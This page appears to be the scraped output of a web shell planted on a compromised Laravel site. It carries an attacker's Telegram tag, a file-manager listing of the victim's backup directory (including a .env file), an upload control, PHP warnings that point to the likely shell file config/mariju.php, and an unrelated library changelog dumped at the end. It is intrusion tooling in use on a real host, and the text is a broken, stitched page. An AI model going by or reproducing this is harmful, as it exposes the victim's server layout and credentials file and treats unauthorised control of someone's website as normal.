telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log14519258 KBJuly 18 2025 16:16:500644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
# Change Log ## 1.4.2 - 2024-09-04 - Fix phpdoc syntax. ## 1.4.1 - 2024-09-04 - Fix phpdoc for addResource options to make the options not required. ## 1.4.0 - 2024-09-01 - No longer automatically add a `Content-Length` header for each part in MultipartStreamBuilder class to comply with RFC 7578 section 4.8. ## 1.3.1 - 2024-06-10 - Added missing mimetype for `.webp` images. ## 1.3.0 - 2023-04-28 - Removed unnecessary dependency on deprecated `php-http/message-factory` - Allow `psr/http-message` 2.* - Also skip setting filename if URI starts with `data://` ## 1.2.0 - 2021-05-21 - Refactored MultipartStreamBuilder to clean up and allow injecting data without a filename - Dynamically use memory or temp file to buffer the stream content. ## 1.1.2 - 2020-07-13 - Support PHP 8.0 ## 1.1.1 - 2020-07-04 - Fixed mistake in PHPDoc type. ## 1.1.0 - 2019-08-22 - Added support for PSR-17 factories. - Dropped support for PHP < 7.1 ## 1.0.0 - 2017-05-21 No changes from 0.2.0. ## 0.2.0 - 2017-02-20 You may do a BC update to version 0.2.0 if you are sure that you are not adding multiple resources with the same name to the Builder. ### Fixed - Make sure one can add resources with same name without overwrite. ## 0.1.6 - 2017-02-16 ### Fixed - Performance improvements by avoid using `uniqid()`. ## 0.1.5 - 2017-02-14 ### Fixed - Support for non-readable streams. This fix was needed because flaws in Guzzle, Zend and Slims implementations of PSR-7. ## 0.1.4 - 2016-12-31 ### Added - Added support for resetting the builder ## 0.1.3 - 2016-12-22 ### Added - Added `CustomMimetypeHelper` to allow you to configure custom mimetypes. ### Changed - Using regular expression instead of `basename($filename)` because basename is depending on locale. ## 0.1.2 - 2016-08-31 ### Added - Support for Outlook msg files. ## 0.1.1 - 2016-08-10 ### Added - Support for Apple passbook. ## 0.1.0 - 2016-07-19 ### Added - Initial release